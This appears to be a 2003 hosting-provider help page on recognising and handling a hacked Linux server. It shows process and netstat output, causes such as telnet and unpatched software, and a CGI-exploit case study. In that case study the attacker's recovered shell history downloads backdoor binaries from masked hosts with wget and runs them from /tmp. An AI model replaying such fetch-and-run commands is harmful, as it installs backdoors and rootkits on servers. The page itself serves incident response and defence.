It doesn't only happen to others.
How to see that a machine is hacked?
By having a look at MRTG, you can't go wrong:
And on the machine, we find:
root 3632 0.0 1.0 2368 1320 pts/0 S 10:51 0:00 -bash
root 6310 0.0 0.1 476 248 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400
[...]
root 6360 0.0 0.1 476 244 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400
root 6310 0.0 0.1 476 248 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400
[...]
root 6360 0.0 0.1 476 244 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400
Obviously, the hacker has been able to launch softs in root. The machine is thus hacked and must be re-installed.
# netstat -tanpu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:9875 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:1052 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:6770 0.0.0.0:* 28823/xc
# ps auxw | grep 28823
root 7117 0.0 0.5 1796 748 pts/1 S 11:38 0:00 grep 28823
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:9875 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:1052 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:6770 0.0.0.0:* 28823/xc
# ps auxw | grep 28823
root 7117 0.0 0.5 1796 748 pts/1 S 11:38 0:00 grep 28823
It exist launched softs, which have a pid and that are not seen by ps, surely due to the fact that ps has been replaced by a hacked ps that filters all softs of the hacker in order to trick the eye.
# halt
Broadcast message from root (pts/1) Thu Nov 20 11:39:22 2003...
The system is going down for system halt NOW !!
We immediately stop the machine.
We can have the chance to have a SemiHackedMachine.
An other experience: HackedMachineExample..
Why is the machine hacked?
The origin of the problems are multiple, but we can sum up it as follows:
you are not paranoid.
You use telnet. Your login and password travel via Internet and they can be 'stolen' at any time. You must use SSH. Here is a manual about it: SshOnDedicated.
You use FTP, your login and password travel on Internet and it's the same root password. Sftp is your solution.
You use pop3/imap with the password and it's the root password. Use APOP or POP3S/IMAPS. Here is a manual about it: SmtpPop3Imap.
If you don't update your server with releases ReleasePatch, your risk easy hack (about 250 scans are carried out a day on our network in order to detect security faults).
What to do?
Once the machine is hacked, there is only one efficient solution left: to reinstall it.
The price is £90 + VAT and you restart with a re-setup release on a new disk. If the box allows it, we will put the previous disk in secondary and we mount it on /mmt (for 10 days).
Hack examples
1. CGI script fault
Symptoms
A g00dies.tgz file uploaded in /tmp with other files: x, k, etc...
The x program is a backdoor, if it's launched, it gives access to the server.
We have found the bash.history of nobody user in /tmp, here is the content:
cd /tmp
wget www.#######.com/x
chmod +x x
./s
./x
./x
./x
./x./x
./x
./x
./x
./x
wget www.#######.com/k
chmod +x k
./k -d;
/tmp/x
./x
./x
./x
./x
./x
./x
./
cd /tmp
mkdir .,
cd .,
wget ######.go.ro/vampix
tar zxvf vampix
cd esc
./mingetty
./mingetty
./mingetty
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
cd /tmp
wget ######.go.ro/smth
chmod +x smth
./smth
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
/tmp/smth
/tmp/stealth
wget www.#######.com/x
chmod +x x
./s
./x
./x
./x
./x./x
./x
./x
./x
./x
wget www.#######.com/k
chmod +x k
./k -d;
/tmp/x
./x
./x
./x
./x
./x
./x
./
cd /tmp
mkdir .,
cd .,
wget ######.go.ro/vampix
tar zxvf vampix
cd esc
./mingetty
./mingetty
./mingetty
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
cd /tmp
wget ######.go.ro/smth
chmod +x smth
./smth
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
/tmp/smth
/tmp/stealth
Comments
Thanks to it, we can notice that commands have been placed as nobody, but this user is mainly used by Apache. It looks like the hacker benefited from a vulnerability of a CGI script.
Resolution
- Killer all suspected process in progress.
The hacker is obviously not in root (it could actually benefit from a kernel default <2.4.24);
However, we make some basic operations/verifications:
- Change all passwords: root, user, mysql, mail, etc... (we can see that the hacker has launched mingetty)
- Search for files, which have been modified since the hack: find /rep -cmin -60 (check all files modified for less than one hour).
- Consult then Apache logs at about the time the hack happened to find the suspected script.